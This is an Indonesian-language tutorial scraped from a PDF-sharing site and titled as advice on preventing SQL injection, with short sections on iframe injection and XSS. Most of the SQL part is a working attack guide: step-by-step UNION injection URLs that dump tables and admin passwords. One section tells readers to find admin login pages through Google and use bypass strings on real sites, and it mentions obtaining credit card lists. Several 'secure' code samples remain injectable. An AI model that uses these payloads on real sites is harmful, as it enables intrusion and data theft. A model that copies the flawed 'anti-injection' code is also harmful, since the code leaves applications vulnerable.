anti sql injection

5/17/2018 Anti SQL Injection - slidepdf.com

http://slidepdf.com/reader/full/anti-sql-injection-55b07acfb7bf9 1/14

A. Anti SQL Injection

Teknik sql injection adalah suatu teknik

yang sering digunakan oleh para attacker. teknik

ini memanfaatkan kelemahan perinyah SQL untuk

melakukan hacking situs. Salah satu fasilitas yang

sering dijadikan sasaran utama adalah pada menu

login. Untuk itu kali ini saya akan menerangkan bagaimana membuat anti sql injection pada

menu login.

1. Membuat database.

Terlebih dahulu silahkan anda membuat database. Setelah anda selesai silahkan anda

buka phpMyAdmin anda. kemudian buat sebuah database baru dan namakan 'tips1'.

Setelah itu import data tabel yang baru anda download tadi pada data base 'tips1'.

2. Kemudian silahkan anda buat file php. (anda bisa memakai notepad ++ ) Ketik program

berikut kedalam file yang baru anda buat.

Setelah selesai silahkan anda simpan dengan nama login.php.

Program adalah sebagai berikut :

<font face="Verdana, Arial, Helvetica, sans-serif" size="3">

<b>Halaman Login User :</b><p><form id="form1" name="form1" method="post" action="proses.php"><table width="50%" border="0">

<tr><td width="18%">Username</td><td width="2%">:</td><td width="80%"><label><input name="username" type="text" id="username" /></label></td>

</tr><tr>

<td>Password</td><td>:</td><td><label><input name="password" type="password" id="password" /></label></td>

</tr><tr>



<td>Â </td><td>Â </td>

<td><label><input name="login" type="submit" id="login" value="Login" />

<input name="batal" type="reset" id="batal" value="Batal" />

</label></td></tr>

</table></form> Setelah itu silahkan anda buat lagi sebuah file php, dan beri nama proses.php.

<font face="Verdana, Arial, Helvetica, sans-serif" size="6"><?php$link = mysql_connect("localhost", "root", "");mysql_select_db("tips1", $link); $query = sprintf("Select * from anggota whereusername='$username' and password='$password'",mysql_real_escape_string($username), mysql_real_escape_string($password));

$hasil=mysql_query($query);$hasil_cek = mysql_num_rows($hasil);if ($hasil_cek==0){echo "Anda tidak dapat login";

}else{echo "<b>Selamat datang pada situs < font color=\"#FF0000\"><ahref="http://toptutorialweb.blogspot.com">WEB ANTI SQL INFECTION</a> </font></b>"; }?>

Yang perlu di ketahui sebelum sql injection pada mysql:karakter: ' atau -

comments: /* atau --information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

=step Satu:=

carilah target

misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah adapesan error.

contoh:

[site]/berita.php?id=100' atau[site]/berita.php?id=-100Sehingga muncul pesan error seperti berikut (masih bnyak lagi):



=step Dua:=

mencari dan menghitung jumlah table yang ada dalam databasenya...

gunakan perintah : order by

contoh:[site]/berita.php?id=-100+order+by+1-- atau[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...misal:

[site]/berita.php?id=-100+order+by+1--[site]/berita.php?id=-100+order+by+2--[site]/berita.php?id=-100+order+by+3--[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8

menjadi [site]/berita.php?id=-100+order+by+8--

=step Tiga:=

untuk mengeluarkan angka berapa yang muncul gunakan perintah unionkarena tadi error sampai angka 9

maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukanperintah tsb pada nagka yg keluar tadi

misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8—

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus

menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakanperintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di

ver 5 ini bisa menggunakan perintah From+Information_schema..

=step Empat:=



untuk menampilkan table yg ada pada web tsb adalahperintah table_name >>> dimasukan pada angka yg keluar tadi

perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"

=step Lima:= Untuk menampilkan semua isi dari table tsb adalah

perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi

perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan

setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

= step Enam: =Perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi

perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan

setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengancara mengkonversinya

website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--

=step Tujuh:=

Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara



perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka ygkeluar tadi

perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isicolumn),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

= step Delapan:

Tahap terakhir mencari halam admin atau login .

SCRIPT CODE LOGIN ANTI SQL INJECTION

Untuk mengetahui secara mudah tentang dampak dari serangan ini, kita mengambil

contoh pada proses "LOGIN". Proses "LOGIN" adalah proses yang paling vital dalam setiap

aplikasi yang ada. Karena dengan adanya proses ini, masing-masing user dapat ditentukan

haknya dalam mengakses suatu aplikasi. Contohnya pada aplikasi-aplikasi perkantoran, proses"LOGIN" sangat berguna untuk menentukan jabatan dan pekerjaan apa yang harus dilakukan

seorang karyawan dalam aplikasi yang dibuat.

Di sini saya membuat contoh aplikasi Visual Basic dengan Database Access. Untuk itu

buatlah desain form seperti yang tampak pada gambar dibawah ini.

Biarkan Property Name pada masing-masing control apa adanya. Selanjutnya kita desain

sebuah database sederhana. Buatlah database Microsoft Access dengan nama tabel "login" yang



berisi kolom (field) "user" dan "password", lalu namakan databasenya "pegawai.mdb". Isikan

dengan beberapa record.

Setelah semuanya selesai, pindah ke apliasi Visual Basic 6, tulislah code berikut pada

Form1.Code::Private Sub Command1_Click() Data1.RecordSource = "SELECT * FROM LOGIN WHERE USER='" & Text1.Text & _"' AND PASSWORD='" & Text2.Text & "'" Data1.Refresh

If Data1.Recordset.RecordCount > 0 Then MsgBox "Login Berhasil!"

Else MsgBox "Login Salah!"

End If End Sub

Private Sub Form_Load() Data1.RecordSource = "SELECT * FROM LOGIN" Data1.Refresh

End Sub

Untuk melihat dampak dari serangan ini. Jalankan kembali aplikasi yang kita buat, dan

anggaplah Anda sebagai orang lain yang tidak mengetahui password untuk mengakses aplikasi

tersebut. Namun dengan sedikit SQL Injection anda dapat memasuki ruang login hanya denganmemasukkan teks berikut "hack' or '1'='1" (tanpa tanda kutip) pada textbox input user dan/atau

password. Maka Anda tidak akan melihat pesan "Login Salah!" melainkan "Login Berhasil!".

Ketika kita memasukkan user "meyer" dan password "tomero", maka query sql pada code

diatas akan menjadi :

Quote:

SELECT * FROM LOGIN WHERE USER='meyer' AND PASSWORD='tomero'"

Karena SQL menggunakan kriteria berdasarkan user dan password tersebut, maka jikauser dan password tidak cocok dengan yang ada dalam tabel secara otomatis aplikasi

memunculkan pesan "Login Salah!". Tapi, jika kita memasukkan teknik SQL Injection pada

query melalui input pada aplikasi misalkan user dan password "hack' or '1'='1", apa yang terjadi

pada query sebenarnya?

Quote:

"SELECT * FROM LOGIN WHERE USER='hack' or '1'='1' " & _

AND PASSWORD='hack' or '1'='1'"



Query SQL sudah berubah menjadi query yang tidak menampilkan filter terhadap user

dan password. Itu dikarenakan pernyataan "OR 1=1" menyebabkan hasil execute query yang

menghasilkan nilai True. Mengapa True? Dalam logika matematika, False Or True atau True OrTrue menghasilkan nilai True.

Selanjutnya kita akan membuat contoh sederhana prosedur untuk memfilter input yang

dimasukkan oleh orang agar tidak bisa dicurangi dengan SQL Injection.

Code::

Private Function FilterSQL(strInput As String) As StringstrInput = Replace(strInput, "'", "''", 1, -1, 1)strInput = Replace(strInput, "_xp", "", 1, -1, 1)strInput = Replace(strInput, "--", "", 1, -1, 1)

strInput = Replace(strInput, ";", "", 1, -1, 1)FilterSQL = strInput

End Function

Prosedur diatas akan mengubah semua karakter-karakter yang berdampak pada teknik

SQL Injection ini. Untuk itu tambahkan prosedur tersebut dalam code sebelumnya dan gantilah

query SQL untuk proses filter user dan password seperti code berikut.

Code::

Data1.RecordSource = "SELECT * FROM SISWA WHERE NAMA='" & FilterSQL(Text1.Text)

& _

"' AND ASAL='" & FilterSQL(Text2.Text) & "'"

Data1.Refresh

Agar lebih kebal dari SQL injection, scrip code untuk login dapat anda buat lebih spesifik

yang mengquery tabel login/user. Isian text oleh user jika dieksekusi tidak mengakibatkan SQL

injection, karena proses validasi ada pada pencocokan isi tabel login/user. Berdasar kriteria filter

tersebut kemudian cocokan recorset field USER dan PASSWORD nya. Jika cocok maka proses

login dapat Anda terusan ke aplikasi berikutnya, jika tidak maka keluar.



Databse yg digunakan PBL.MDB berisi Tabel PUser dgn field UserName(text 20),Password(text 20).

Buatlag form spt diatas dan code program sbb:

Option Explicit Dim cnPBL As ADODB.Connection Dim rsPuser As ADODB.Recordset ----------------Private Sub cmdExit_Click()End End Sub---------------------------Private Sub cmdOK_Click()On Error GoTo PP Dim coba As Integer Dim Uname As String Dim Pwd As String Dim SQL As String

Uname = Trim(txtPuser.Text)Pwd = Trim(txtPassword.Text)

SQL = "SELECT * FROM PUSER WHERE UserName=" & "'" & Uname & "' ANDPassword=" & "'" & Pwd & "'"rsPuser.Open SQL, cnPBL, adOpenKeyset, adLockOptimistic If Not (txtPuser.Text = rsPuser!UserName And txtPassword.Text = rsPuser!Password) Then

txtPuser.Text = ""txtPassword.Text = ""txtPuser.SetFocus MsgBox "USER NAME ATAU PASSWORD SALAH", vbCritical, "INFO"Exit Sub

End If If txtPuser.Text = "" Or txtPassword.Text = "" Then

txtPuser.SetFocusExit Sub

End If frmLogin.Hide

frmBarang.Show ' jika benar buka form aplikasiPP:Select Case Err.Number Case 3705

rsPuser.Close Resume

End Select End Sub-----------------------------Private Sub Form_Load()



Set cnPBL = New ADODB.ConnectionSet rsPuser = New ADODB.Recordset

cnPBL.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source= " & App.Path &"\PBL.mdb;Persist Security Info=False"rsPuser.Open "SELECT * FROM Puser", cnPBL, adOpenKeyset, adLockOptimisticEnd Sub----------------------------------------------------Private Sub txtPassword_KeyPress(KeyAscii As Integer) If KeyAscii = 13 ThencmdOK.SetFocusEnd If End Sub--------------------------------------------------Private Sub txtPuser_KeyPress(KeyAscii As Integer) If KeyAscii = 13 ThentxtPassword.SetFocusEnd If End Sub

Program atau software seperti softice

Contoh sintaks SQL Injection

Contoh

sintak SQL dalam PHP

1.$SQL

= “select * from login where username =‟$username‟ and passw ord =„$password ‟”; ,{dari GET atau POST variable }

2.Isikan password dengan string ‟ or ‟‟ = ‟

3.Hasilnya maka SQL akan seperti ini :

“select * from login where username = ‟$username‟ and password=‟pass‟ or „=′”;

,{ dengan SQL ini hasil selection akan selalu TRUE }

4.Maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL Gambar contoh SQLInjection



Penanganan SQL Injection

1. Merubah script php Contoh script php semula :

$query = "select id,name,email,password,type,block from user " ."where email = '$Email' and password = '$Password'";$hasil = mySQL_query($query, $id_mySQL);while($row = mySQL_fetch_row($hasil)) { $Id = $row[0]; $name = $row[1];$email = $row[2];$password = $row[3];$type = $row[4];$block = $row[5]; }if(strcmp($block, 'yes') == 0){echo "<script>alert('Your account has been blocked');document.location.href='index.php';

</script>\n";exit();

}else if (!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL

kedalam

form login.Ketika hacker menyisipkan karakter ‟ or ‟‟ = ‟kedalam form email dan password maka akan terbentuk query sebagai berikut :

Maka dilakukan perubahan script menjadi :$query = "select id,name,email,password,type,block from user"."where email = '$Email'";$hasil = mySQL_query($query, $id_mySQL);while($row = mySQL_fetch_row($hasil))

{ $Id = $row[0];$name = $row[1];

$email = $row[2];$password = $row[3];$type = $row[4];$block = $row[5]; }if(strcmp($block, 'yes') == 0){echo "<script>alert('Your account has been blocked'); document.location.href='index.php';



</script>\n";exit(); }$pass = md5($Password);else if

((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0))

2. Menggunakan MySQL_escape_string

Merubah string yang mengandung karakter „ menjadi \ ‟ misal

SQL injec‟tion menjadi SQL injec \ ‟tion.

Contoh :

$kar = “SQLinjec‟tion”;

$filter = mySQL_escape_string($kar);echo”Hasil filter : $filter”;

3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini

sehingga menyebabkan string maupun karakter „ diubah menjadi \ ‟ secara otomatis

oleh php.ini

Implementasi SQL Injection

1. Masuk ke google atau browse yg lain.2. Masukkan salah satu keyword berikut

"/admin.asp""/login.asp""/logon.asp""/adminlogin.asp""/adminlogon.asp""/admin_login.asp"

"/admin_logon.asp""/admin/admin.asp""/admin/login.asp""/admin/logon.asp"

{anda bisa menambahi sendiri sesuai keinginan anda}

3. Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai

sebuah halaman login (user name danpassword).4. Masukkan kode berikut :

User name : ` or `a'='a



Password : ` or `a'='a (termasuk tanda petiknya)

5. Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisamenambahkan berita, mengedit user yang lain, merubah about, dan lain-lain. Jika beruntung

Anda bisa mendapatkan daftar kredit card yang banyak.6. Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.

7. Banyak variasi kode yang mungkin, antara lain :User name : admin

Password : ` or `a'='aatau bisa dimasukkan ke dua–duanya misal :

„ or 0=0-- ;“ or 0=0-- ; or 0=0 -- ;„ or 0=0 #

;“ or 0=0 # ;„ or ‟x‟=‟x ;“ or “x”=”x;„) or („x‟=‟x

8. Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION

a. Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan

perintah yang panjang.b. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input

Validation).c. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.

d. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jikamemungkinkan.

e. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Securitytab.



B. I frame injection

Iframe adalah sebuah kode pemograman html yang

fungsinya menampilkan halaman website atau script yang di

hosting di tempat lain agar tampil menyatu dengan halaman

website anda, seolah-olah halaman atau script itu adalah bagian

dari website anda.

Injection adalah aktifitas menyisipkan kode ke dalam sebuah

halaman website anda tanpa seizin anda selaku pemilik dari website tersebut, Iframe Injection

adalah aktifitas menysipkan kode-kode html Iframe di website anda tanpa seizin anda selaku

pemilik website. Yang bikin repot adalah halaman atau script yang di sisipkan kedalam kode

tersebut biasanya berisikan spyware, mal ware atau badware yang dapat merugikan website anda

dan juga pengunjung website anda.

Asal Iframe Injection

Biasanya secara tidak sadar anda mendownload sesuatu yang sudah terinfeksi oleh

badware, dan badware yang terinstal di pc anda ini mencari password FTP anda dan

melaporkannya ke pemilik, dan kemudian sebuah robot pemograman beroperasi secara otomatis

menggunakan password yang di dapat itu untuk melakukan injection ke halaman website anda.

Oleh karenanya meskipun anda menghapus kode-kode injection di website anda, aktifitas

injection ini tidak pernah berhenti sebelum anda menghapus badware dari computer anda.

Biasanya jumlah halaman yang terinfeksi tidak tanggung-tanggung bisa diatas 50

halaman website, meski taget utamanya adalah halam index website. Oleh karenya cara

mengatasinya adalah dengan terlebih dahulu menghapus badware yang terinstal secara tidak

sengaja itu dari computer anda.

Mengatasi Iframe Injection

Langkah pertama adalah gunakan Anti Virus yang layak untuk melindungi computer

anda, karena dengan menggunakan anti virus yang layak ketika secara tidak sengaja anda

melakukan instalasi sebuah badware secara otomatis akan ada pemberitahuan bahwa anda akan

menginstal sesuatu yang dapat membahayakan komputer anda.

Anda dapat menggunakan anti virus gratis yang cukup ampuh yaitu AVG, silahkan

download di situs resminya. Lakukan scan secara menyeluruh terhadap computer anda, dan juga

pastikan anda selalu melakukan up date terhadap anti virus anda. Gunaka juga anti spyware di

komputer anda, anti spyware gratis yang dapat anda gunakan adalah Spyware Terminator.



Setelah anda menlakukan scan terhadap komputer anda dengan menggunakan anti virus dan anti

spyware, langkah selanjutnya adalah mengganti user dan password log in ke panel hosting anda,

FTP dan administrator website anda. Setelah itu baru lakukan pemberisihan dari kode-kode yangmenginfeksi halaman website anda, jika anda melakukan back up secara berkala terhadap

website maka anda dapat merestore file-file dengan data backup sebelum website anda terkena

injection. Jangan langsung menjadi stress berat jika menghadapi sesuatu yang buruk, tenang dan

mulailah mencari jalan keluarnya pasti anda akan dapat menyelesaikan permasalahan anda.

C. XSS Injection

XSS Cross Site Scripting adalah sisi klien serangan di mana seorang penyerang

menciptakan link jahat,script berisi kode yang kemudian dilaksanakan dalam browser korban.

Kode script bisa bahasa apapun yang didukung oleh browser, tetapi sebagian besar HTML dan

Javascript yang digunakan bersama dengan embedded Flash, Java atau ActiveX.

Apa yang bisa Cross Site Scripting digunakan untuk?

Cross Site Scripting dapat digunakan untuk berbagai hal, seperti sesi-pembajakan,

browser serangan, phishing, propaganda dan bahkan cacing! Namun masih memerlukan korban

untuk mengkliklink jahat diciptakan oleh penyerang.

Bagaimana bisa Satu mendapatkan korban untuk mengklik link XSS?

Cara termudah untuk membuat orang meng-klik link berbahaya adalah untuk membuat

mereka terlihat otentik dan non -

jahat. Memberi mereka alasan kemudian adalah rekayasa sosial-bagian yang harus mudah

kecuali jika korban sadar serangan tersebut dan / atau memiliki tindakan terhadap Cross Site

Scripting, seperti NoScript.

Bagaimana Satu menghindari XSS-links tampak mencurigakan?

Hal ini biasanya dilakukan dengan penyandian, layanan url pendek, mengarahkan danbahkan flash!

Yang tipe Cross Site Scripting yang ada?

Jenis yang paling umum adalah GET dan POST berbasis XSS. Namun Cross Site

Scripting juga bias dipicu melalui cookie. Beberapa individu mengklaim bahwa XSS juga dapat

dibagi menjadi gigih dan non-persistent tetapi juga jenis-jenis dan harus disebut sebagai injeksi

yang berbeda kelas bug / kerentanan.

anti sql injection

Documents